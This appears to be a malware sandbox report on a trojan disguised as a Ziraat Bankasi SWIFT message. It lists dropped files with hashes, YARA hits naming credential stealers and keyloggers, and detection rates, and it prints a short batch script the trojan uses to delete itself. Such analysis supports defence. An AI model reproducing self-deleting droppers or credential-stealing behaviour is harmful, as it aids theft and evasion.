                                                                                                                                                      MD5:8064E730487A7492200F210D929C8423
                                                                                                                                                      SHA1:65C892BE84C7B59DA335981E8B86CE5A53B40B6D
                                                                                                                                                      SHA-256:1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
                                                                                                                                                      SHA-512:A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!*h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-*l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.*ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB*0A/3H.%CZR.RJV*O0N.4N3HDHCZRTSJVD.0N..*R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\bothsided\spadixes.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1347584
                                                                                                                                                      Entropy (8bit):7.98998888129021
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
                                                                                                                                                      MD5:8064E730487A7492200F210D929C8423
                                                                                                                                                      SHA1:65C892BE84C7B59DA335981E8B86CE5A53B40B6D
                                                                                                                                                      SHA-256:1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
                                                                                                                                                      SHA-512:A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!*h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-*l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.*ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB*0A/3H.%CZR.RJV*O0N.4N3HDHCZRTSJVD.0N..*R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\bothsided\spadixes.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1347584
                                                                                                                                                      Entropy (8bit):7.98998888129021
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
                                                                                                                                                      MD5:8064E730487A7492200F210D929C8423
                                                                                                                                                      SHA1:65C892BE84C7B59DA335981E8B86CE5A53B40B6D
                                                                                                                                                      SHA-256:1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
                                                                                                                                                      SHA-512:A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!*h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-*l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.*ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB*0A/3H.%CZR.RJV*O0N.4N3HDHCZRTSJVD.0N..*R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\bothsided\spadixes.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1347584
                                                                                                                                                      Entropy (8bit):7.98998888129021
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
                                                                                                                                                      MD5:8064E730487A7492200F210D929C8423
                                                                                                                                                      SHA1:65C892BE84C7B59DA335981E8B86CE5A53B40B6D
                                                                                                                                                      SHA-256:1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
                                                                                                                                                      SHA-512:A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!*h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-*l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.*ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB*0A/3H.%CZR.RJV*O0N.4N3HDHCZRTSJVD.0N..*R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\bothsided\spadixes.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1347584
                                                                                                                                                      Entropy (8bit):7.98998888129021
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
                                                                                                                                                      MD5:8064E730487A7492200F210D929C8423
                                                                                                                                                      SHA1:65C892BE84C7B59DA335981E8B86CE5A53B40B6D
                                                                                                                                                      SHA-256:1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
                                                                                                                                                      SHA-512:A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!*h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-*l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.*ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB*0A/3H.%CZR.RJV*O0N.4N3HDHCZRTSJVD.0N..*R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\bothsided\spadixes.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1347584
                                                                                                                                                      Entropy (8bit):7.98998888129021
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
                                                                                                                                                      MD5:8064E730487A7492200F210D929C8423
                                                                                                                                                      SHA1:65C892BE84C7B59DA335981E8B86CE5A53B40B6D
                                                                                                                                                      SHA-256:1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
                                                                                                                                                      SHA-512:A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!*h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-*l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.*ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB*0A/3H.%CZR.RJV*O0N.4N3HDHCZRTSJVD.0N..*R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0
                                                                                                                                                      Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):250368
                                                                                                                                                      Entropy (8bit):5.008874766930935
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
                                                                                                                                                      MD5:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                                                      SHA1:392D68C000137B8039155DF6BB331D643909E7E7
                                                                                                                                                      SHA-256:DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
                                                                                                                                                      SHA-512:9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.|........................................
                                                                                                                                                      Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):98304
                                                                                                                                                      Entropy (8bit):5.68506548460809
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:iwa4JKXrrJUtuACC11BJVeSodqcyxCVf1UMR7pgpPYl4:O4JUXJUUACCzBJVeSOqcyi+MDgpP3
                                                                                                                                                      MD5:D49B97C9900DA1344E4E8481551CC14C
                                                                                                                                                      SHA1:53C7014EB195741A40B1D8CA061945FDE2AA567F
                                                                                                                                                      SHA-256:53406CB7D67E3D71E30AD41AFF5A31B75652624A8641E0EA05F31650ABD3FE42
                                                                                                                                                      SHA-512:8EC5B8E6EE9B0B906A730BC0057A4B4F244F65837828D781D766DA3D496C8CD2AE199CC15502098DF0E61C1287D24CF2810F916D5DA91D7F0B3F458E4CABCB73
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security
                                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: unknown
                                                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Florian Roth
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..v.............. ........@.. ....................................`.................................x...S.................................................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc...............~..............@..B........................H.......t...........Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....*&..( ....*.s!........s"........s#........s$........s%........*Z........o8...........*&..(9....*&........*".......*Vs....(B...t.........*..(C...*"~....+.*"~....+.*"~....+.*"~....+.*"~....+.*b.r...p.oa...(....(@....*:.~.....o....&*.*:.(P....(Q....*..~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\TrojanAI.exe
                                                                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):167
                                                                                                                                                      Entropy (8bit):5.1497127829837765
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:mKDDCMNvFbuov3DerbJSRE2J5xAIJxXZQDwU1hGD0nacwRE2J5xAInTRIOWefBQk:hWKdbuoLe0i23fJRuDNecNwi23fTvWs
                                                                                                                                                      MD5:665F9D75906DD7427B17E1F41A37A730
                                                                                                                                                      SHA1:C42669EB1EBFC3F476055D3245C66BD68B3E50D1
                                                                                                                                                      SHA-256:E2C8F80D1199BB76072081AB795FB0F9644B8E8DE2378B7B76A87C73E3CD8027
                                                                                                                                                      SHA-512:D0E94ABF496EAC0F7DFF0DC2ED30D4DDC98CD258A63D6CCA195C47E8F876F996BC7F955841577974977A5874A3260C8CE08E96304CD74C0C6EA0E413F5E31481
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:@echo off..timeout 6 > NUL..CD C:\Users\user~1\AppData\Local\Temp..DEL "TrojanAI.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpA3B8.tmp.cmd" /f /q..
                                                                                                                                                      Process:C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):2847232
                                                                                                                                                      Entropy (8bit):7.748719367071522
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:Pfg5tQ7a/K+TKq8mFmM1I3Dxei0IqfDX40EaY8A55Dmg27RnWGj:Hg56lWF31I3D4i0vfDX40EFD527BWG
                                                                                                                                                      MD5:DCC2879AA564D607525D1AB00FBF6D6D
                                                                                                                                                      SHA1:39E7F778871B0F835387FE75C2B4DB2F213FF6B9
                                                                                                                                                      SHA-256:DC1E696877DEBE64BB8D38CBD79D1B64664C9571B074065E4DC04159ADDA5A01
                                                                                                                                                      SHA-512:B7C7BE904E87852A0952DF73B75392BA8A88DF6B642AEF29155A24925D53400599B45751B794FB0388E44C72A9DEFE64A8ACC8B53DFDF29F0243109A9275A12C
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L....}Hg..........".................t_............@...........................+.....O.+.......@.......@......................p..|....@..............................................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc........@......................@..@.reloc.......P".......!.............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):12320
                                                                                                                                                      Entropy (8bit):7.9804061530542345
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:SYn1rxnPhpa0RcIAJ34FRyBSIJMLag37qHAQ+e:SYn1BeccIAJW+AWg37qn
                                                                                                                                                      MD5:3241085ACA5F8BC4647820A85E11A543
                                                                                                                                                      SHA1:18FBF757A363CABC0D8F157403F2EB5E6A12CF5C
                                                                                                                                                      SHA-256:DE2A4211F7348D6807072F629E3ECFEF55854E54BA0A57933C7322759BB185A3
                                                                                                                                                      SHA-512:8789C4514996B3454EAD89A78EF8B74E075502D18C6549045C9D712CBB6424367F35C492478D65E877B27FE286F5F8FF07122A661B63DD55536D419B30ED5CFC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...[....Oh...g...W>_+-&.}/.k..7]d.....p~=.0..vt)....2F.h..h:`..........-.`.4j..i#$q3.....4J.3R.......h...&'..@.Q]........h.. qJ....~.k`.C;.G}..XB"..!..E.J........!3.{{....\.R.u.gl.q..-..C.`1n.y..#TgcD...ex.+..j.(.s+...DT.[....z...M.....6....$...d.......1t.E<..=.D^../e@+.p?...Y.&.....J..d.,X..a..3DV.J...[.....Q..*...Yb*}R..z.P....T..i7Z6..-..Q.@].....T.4.9M??.....8...L...W.t..NN..~.():.0O.T|/..l`N,.IK.}......&.~_ZA.N)..i.%<`c.%...U..(.N...D...^.s.QY]?..c..*G1..E..!..Zee..HZ.....}%.,."....WF..s.r'.4...!d6*2Q.U.....U1.,...zT.[ ..9.Hq0Vil...||$>..,.S...M....p*l..&1.k..2......:.....Z .j.{../..G.4.g..k9.......T .;..0.f..+..R.;l..U..y9:..M"................f......8.t.(...>..!....a.Pd...x.b..=.E.`.3...<...G.:..e?i.i.;o..zVE..s..L=..!.}...g_.(u)O....Y...}.G+..:c\...X3.~.vE..?L.g.].u....../b.........U..lBD.....bd.Fy.....w.l......!...?.6...f`F...eM.?T.:..q..H.gL.0sS.^|....?.F......X...c5&...SZp}t.?......O....5/w....`...>......a.....&..e....p(9
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\TrojanAI.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):231936
                                                                                                                                                      Entropy (8bit):5.039764014369673
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                                                      MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                      SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                                                      SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                                                      SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
